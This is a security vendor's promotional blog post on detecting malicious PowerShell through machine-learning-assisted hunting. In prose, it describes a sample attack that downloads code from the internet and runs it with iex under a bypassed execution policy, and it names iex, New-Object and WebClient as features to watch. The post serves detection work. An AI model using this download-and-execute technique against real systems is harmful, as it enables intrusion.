PowerShell is a powerful scripting language. Admins love it because they can load arbitrary code or access resources. On the other hand, attackers love it for the same reasons. It’s extremely effective for living off the land (LotL) and avoiding typical detection methods within endpoint or XDR solutions. 

The challenge of building a PowerShell detection is a “non-empty intersection” between how attackers use PowerShell scripts versus how admins use them. We see the usage of functions like iex, New-Object and WebClient in both administrative and malicious scripts. Thankfully, malicious script detection is possible because the behavioral patterns for each are different. We can use these differences to our advantage when helping customers detect this type of attack. 

Anvilogic has a different approach to detecting advanced threats like suspicious PowerShell: Advanced Threat Detection (ATD). Our approach to ATD provides you with a hunting co-pilot — automating the human approach of hypothesis-driven hunting while leveraging machine learning (ML). The way we approach this is three-fold:

1. The Armory: A growing collection of over 1,000 ready-to-deploy detection rules, trending topics, and threat research and intelligence from our purple team of researchers and hunters with over 60 years of cumulative experience.
2. Anvilogic Hunting Framework: Provides a hunting co-pilot that escalates suspicious activity, sends significant alerts to triage for investigation, and enriches data to find and remove false positives or unwanted alerts.
3. Targeted ML: Threat hunter-trained ML finds suspicious patterns inside Events of Interest (or high-fidelity alerts) instead of your raw data, so you don’t miss threats in plain sight.

‍So why utilize Anvilogic’s ATD? Why not just build your own detection?

A unique aspect of our approach to ATD is that we use our entire customer base to tune our ML models. You can think of our broad customer base as your peer group. With a large peer group across different industries and company sizes, you benefit from those real-world insights while helping us build a better ML model in the process. As a result, ATD significantly uplifts what an in-house group of analysts, engineers, and data scientists could do on their own with their SOC resources. You could, of course, do this all yourself — collect external resources, create datasets, and continuously curate and update ML models — but why would you when you have a plethora of other things you need to do? 

By observing legitimate behavior across a large and diverse customer base that uses PowerShell to accomplish tasks, we can differentiate between admin-initiated tasks and attacker-led actions and then deliver those insights directly to you. 

How are we building more effective ML models?

It is common practice when building ML models to let your deep learning models perform the “feature engineering,” that is, determine what are interesting signals in the data to make a decision. This works well when you have lots of data representing all potential input (e.g., ChatbotGPT was trained on an extremely large dataset from the Internet). Unfortunately, in cybersecurity, we generally lack these large-sized datasets. We’ve also observed that ML models without any guidance may pick features to make decisions that work well in the training set but work extremely poorly when the model encounters new data. 

Therefore, we built this model with our purple team of researchers, hunters, and experts (The Forge) to identify features in PowerShell that analysts would focus on to determine if the script is malicious. We also source training sets from the Forge team to provide the model with high-quality examples of malicious data. Below is a malicious script from our dataset provided by our Forge team:

Note that we have replaced some variable parts with XXX. The features for our model to consider focus our attention on key aspects of this malicious script: a download of code from the internet that is then executed by iex. The execution policy of bypass enables the malicious code to run unblocked. Therefore, by leveraging our team’s hands-on-keyboard hunt experience, threat research, and expertise in building deep learning models, we can deploy effective ML models on your behalf — saving you the time and effort of rolling out your own.

Anvilogic’s ATD bolsters your hunting resources and provides insights that help you easily piece together the story of an incident. By leveraging ML-driven analytics and our purple team of researchers, hunters, data scientists, and product leaders with over 60 years of collective experience, you benefit from the additional coverage and insights from the Anvilogic. 

For more information about the benefits of ATD, check out our data sheet or schedule a time to talk to one of our experts. 

Wishing you better hunts in 2023,

Alexa Araneta & Mike Hart